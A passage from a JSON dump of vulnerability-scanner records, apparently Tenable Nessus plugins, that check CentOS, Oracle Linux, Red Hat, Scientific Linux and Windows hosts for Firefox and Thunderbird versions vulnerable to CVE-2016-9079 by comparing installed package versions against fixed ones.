execute\n arbitrary code with the privileges of the user running\n Firefox. (CVE-2016-9079)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1612&L=scientific-linux-errata&F=&S=&P=15603\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b6599d5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"firefox-45.5.1-1.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"firefox-debuginfo-45.5.1-1.el5_11\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"firefox-45.5.1-1.el6_8\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"firefox-debuginfo-45.5.1-1.el6_8\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-45.5.1-1.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-45.5.1-1.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:06", "description": "The version of Mozilla Thunderbird installed on the remote Windows host is prior to 45.5.1. It is, therefore, affected by a use-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling SVG animations. An unauthenticated, remote attacker can exploit this issue, via a specially crafted web page, to deference already freed memory, resulting in the execution of arbitrary code.", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Mozilla Thunderbird < 45.5.1 nsSMILTimeContainer.cpp SVG Animation RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MOZILLA_THUNDERBIRD_45_5_1.NASL", "href": "https://www.tenable.com/plugins/nessus/95476", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95476);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_xref(name:\"MFSA\", value:\"2016-92\");\n script_xref(name:\"CERT\", value:\"791496\");\n\n script_name(english:\"Mozilla Thunderbird < 45.5.1 nsSMILTimeContainer.cpp SVG Animation RCE\");\n script_summary(english:\"Checks the version of Thunderbird.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a mail client that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Mozilla Thunderbird installed on the remote Windows\nhost is prior to 45.5.1. It is, therefore, affected by a\nuse-after-free error in dom/smil/nsSMILTimeContainer.cpp when handling\nSVG animations. An unauthenticated, remote attacker can exploit this\nissue, via a specially crafted web page, to deference already freed\nmemory, resulting in the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Thunderbird version 45.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9079\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:FALSE, fix:'45.5.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:00", "description": "An update for firefox is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.", "cvss3": {}, "published": "2016-12-05T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : firefox (CESA-2016:2843)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:firefox", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2016-2843.NASL", "href": "https://www.tenable.com/plugins/nessus/95484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2843 and \n# CentOS Errata and Security Advisory 2016:2843 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95484);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"RHSA\", value:\"2016:2843\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : firefox (CESA-2016:2843)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 5,\nRed Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this\nissue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-December/022167.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?21455cd2\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-December/022168.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?947dab1a\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2016-December/003693.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5a50bff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9079\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"firefox-45.5.1-1.el5.centos\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"firefox-45.5.1-1.el6.centos\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"firefox-45.5.1-1.el7.centos\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:52", "description": "From Red Hat Security Advisory 2016:2850 :\n\nAn update for thunderbird is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.", "cvss3": {}, "published": "2016-12-06T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : thunderbird (ELSA-2016-2850)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:thunderbird", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-2850.NASL", "href": "https://www.tenable.com/plugins/nessus/95561", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2850 and \n# Oracle Linux Security Advisory ELSA-2016-2850 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95561);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"RHSA\", value:\"2016:2850\");\n\n script_name(english:\"Oracle Linux 6 / 7 : thunderbird (ELSA-2016-2850)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2016:2850 :\n\nAn update for thunderbird is now available for Red Hat Enterprise\nLinux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web\npage containing malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Thunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-December/006551.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-December/006552.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"thunderbird-45.5.1-1.0.1.el6_8\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"thunderbird-45.5.1-1.0.1.el7_3\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:38:55", "description": "An update for thunderbird is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web page containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.", "cvss3": {}, "published": "2016-12-06T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : thunderbird (RHSA-2016:2850)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:thunderbird", "p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2016-2850.NASL", "href": "https://www.tenable.com/plugins/nessus/95562", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2850. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95562);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2016-9079\");\n script_xref(name:\"RHSA\", value:\"2016:2850\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : thunderbird (RHSA-2016:2850)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for thunderbird is now available for Red Hat Enterprise\nLinux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es) :\n\n* A flaw was found in the processing of malformed web content. A web\npage containing malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Thunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/#\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9079\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 